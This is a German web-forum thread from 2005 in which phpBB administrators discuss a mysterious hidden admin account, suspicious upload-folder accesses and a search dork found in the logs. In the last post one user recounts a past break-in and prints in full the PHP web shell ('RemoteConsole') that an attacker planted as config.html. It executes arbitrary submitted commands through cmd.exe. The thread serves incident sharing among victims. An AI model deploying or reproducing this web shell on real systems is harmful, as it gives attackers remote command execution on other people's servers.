Wie kommt der anonyme Admin "p1c2u" auf mein Board

[An-Ja]

Trotzdem sehe ich nun einen Wahnsinn an Zugriffen auf den Upload-Ordner in den Logfiles. Da scheint ein ganzes Template installiert gewesen zu sein, eine redirect vom normalen Forum, ... Ich will gar nicht weiter reden, macht mir Angst!

Zumindest sind all diese Zugriffe von viertel vor 12 bis 12 Uhr erfolgt

Schau dir die Zugriffe vor deinem Posting 11.15 Uhr an. Die späteren Zugriffe werden von denen sein, die deinem Link in deinem Posting gefolgt sind

[smart]

Meinst wohl 12.15, oder?

[An-Ja]

Ich meinte dieses Posting von 11.15 Uhr

Verfasst am: 11.04.2005 11:15 Titel: Wie kommt der anonyme Admin "p1c2u" auf mein Board

--------------------------------------------------------------------------------

Hilfe!
Habe mich gerade ziemlich erschrocken: Ich hatte einen neuen User, der "p1c2u" hieß. Kam mir komisch vor. Also habe ich einmal sein Profil angeklickt - und da stand ADMIN!!! Habe dann alle Angaben überprüft - sein Account war aktiviert, obwohl keine eMail-Adresse angegeben ist. Er hatte 94 Beiträge geschrieben (von denen aber nicht einer gefunden wird, wenn ich "Alle Beiträge anzeigen" anklicke. Und er hat nichts im Forum verändert - soweit ich das auf den ersten Blick erkennen kann. Habe ihn jetzt vorsichtshalber erst einmal noch nicht gelöscht, aber von Admin auf User umgestellt und "deaktiviert", damit ihr euch eventuell selbst davon überzeugen könnt:

direkt zum Forum

Bin über jeden Tipp dankbar, was das wieder einmal war. Mein Admin-Ordner ist per .htaccess geschützt!
_________________
Kein Forum kann so sinnvoll sein wie dieses.

[smart]

Verfasst am: 11.04.2005 12:15 Titel: Wie kommt der anonyme Admin "p1c2u" auf mein Board

--------------------------------

Hilfe!
Habe mich gerade ziemlich erschrocken: Ich hatte einen neuen User, der "p1c2u" hieß. Kam mir komisch vor. Also habe ich einmal sein Profil angeklickt - und da stand ADMIN!!! Habe dann alle Angaben überprüft - sein Account war aktiviert, obwohl keine eMail-Adresse angegeben ist. Er hatte 94 Beiträge geschrieben (von denen aber nicht einer gefunden wird, wenn ich "Alle Beiträge anzeigen" anklicke. Und er hat nichts im Forum verändert - soweit ich das auf den ersten Blick erkennen kann. Habe ihn jetzt vorsichtshalber erst einmal noch nicht gelöscht, aber von Admin auf User umgestellt und "deaktiviert", damit ihr euch eventuell selbst davon überzeugen könnt:

direkt zum Forum

Bin über jeden Tipp dankbar, was das wieder einmal war. Mein Admin-Ordner ist per .htaccess geschützt!
_________________
Kein Forum kann so sinnvoll sein wie dieses.

Wir wohnen wohl in zwei unterschiedlichen Zeitzonen... Ich habe das Posting jedenfalls um kurz nach 12 geschrieben. Wie spät ist es denn gerade bei Dir? Bei mir kurz nach 2 - Mitteleuropäische Sommerzeit.

[smart]

Häää? Leben wir schon in der Zukunft? Habe gerade gesehen, dass ich mein letztes Posting um 15.07 Uhr geschrieben habe - GENIAL! Könnt ihr wohl nicht!

[An-Ja]

bei mir ist es jetzt 14.15 Uhr, dein letztes Posting zeigt´s mir mit 14.07 Uhr an und das Forum zeigt an "Aktuelles Datum und Uhrzeit: 11.04.2005 14:08"

[An-Ja]

Geh mal bitte in dein Profil und änder dort die Zeitzone *zwinker*

[smart]

Lag an meinem Profil, da stand GMT+2 (!!!), muss aber +1 heißen. Sorry!

Hab' ich aber nie dran rumgefummelt!

[larsneo]

Ich habe in den Logs den Suchbegriff: "allinurl:/phpbb2/up.php" gefunden

damit bist du ja quasi schon am anfang der ereigniskette - von diesem zeitpunkt an würde ich die zugriffe der betreffenden ip aufmerksam verfolgen.
nachdem du allerdings die entsprechenden dateien gelöscht hast, ist kaum abzuschätzen, was dein ungebetener gast so alles angestellt hat - schade...

[derd]

Hallo,

Das mit dem Uploadscript habe ich auch schon erlebt. Aber das war eins was ich selber geschrieben hatte ich dachte es wäre sicher. Aber da mein Uploadscript mit dem ftpserver zusammengerabeitet hat konnte er vollen ftp Zugang erhalten. Er hatte dann Kontrolle über alles er hat mysql abgeschalten ......... Man muss dazu sagen es war noch mein Server auf Win2k

Er hatte mir das untergejubelt:

eine config.html mit direkt zugriff auf die cmd.exe ne niedliche RemoteConsole

Code: Alles auswählen

<?php
	if (!$_POST) $_POST = $HTTP_POST_VARS;
	if ($_POST["cmd"]){
		$_POST["cmd"] = stripslashes($_POST["cmd"]);
	}
	if (!$_COOKIE) $_COOKIE = $HTTP_COOKIE_VARS;
	if (!$_COOKIE["screen"]){
		setcookie("screen", exec ("cmd.exe /c cd"));
		$fp = fopen ("clist.txt", "w");
			fwrite($fp,"\n");
		fclose ($fp);
	}
	$title = FALSE;
	$screen = FALSE;
	function exe ($cmd){ global $title, $screen;
		$ext = ($title) ? "\n" : "";
		@exec("cmd.exe /c $cmd > lc.txt");
		$result = file ("lc.txt");
		#$result = file ("clist.txt");
		for ($x = 0; $x < count ($result); $x++){
			$result[$x] = htmlspecialchars($result[$x]);
			$result[$x] = "&nbsp;&nbsp;".str_replace (" ","&nbsp",$result[$x])."<script> scrollBy(100,100); </script>";
			
		}
		$result = "<span style=\"color: yellow\">".exec ("cmd.exe /c ECHO %TIME%")."</span> start executing command ... <br>==>> <span style=\"color: yellow; font-weight: bold\">".trim($cmd)."</span> <br><br>".implode("<br>\n",$result);
		$fp = fopen ("clist.txt", "a");
			fwrite ($fp, "$result\n\n");
		fclose ($fp);
		@setcookie ("screen", $screen = $_COOKIE["screen"] . "<br><br>" . exec("cmd.exe /c cd") . " " . $cmd);
		@unlink ("lc.txt");
		return $result;
	}

	if ($_POST["cmd"]) $screen = exe ($_POST["cmd"]);
	
?>
<html><head><title>
	RemoteConsole
</title><style>
	body, td, input {
		background-color:	#000000;
		color:			#c3c3c3;
		font-family:		"Lucida Console";
		font-size:		12pt;
	}
	input {
		border:			1px solid #c3c3c3;
	}
</style></head><body onLoad="document.all.cmd.focus()" scroll="no">
	<table border="0" width="100%" height="100%">
		<tr><td valign="top">
			<div id="content" style="width: 1000; height: 500; overflow: auto" style="padding: 10px;">
				<?php
					$screen = trim($screen);
					echo (!empty($screen)) ? $screen."<br><br><span style=\"color: yellow\">".exec ("cmd.exe /c ECHO %TIME%")."</span> end executing" : "<span style=\"color: red; font-weight: bold\">waiting for input ...<br></span>";
				?>
			</div>
		<tr><td height="25px" align="center">
			<form method="post">
				<nobr>
					<?=exec ("cmd.exe /c cd").":\\>"?>&nbsp;&nbsp;
					<input name="cmd" style="width: 65%">
					<input type="submit" value="send">
				</nobr>
			</form>
	</table>
</body></html>

Man lernt halt aus sowas.

Bye derd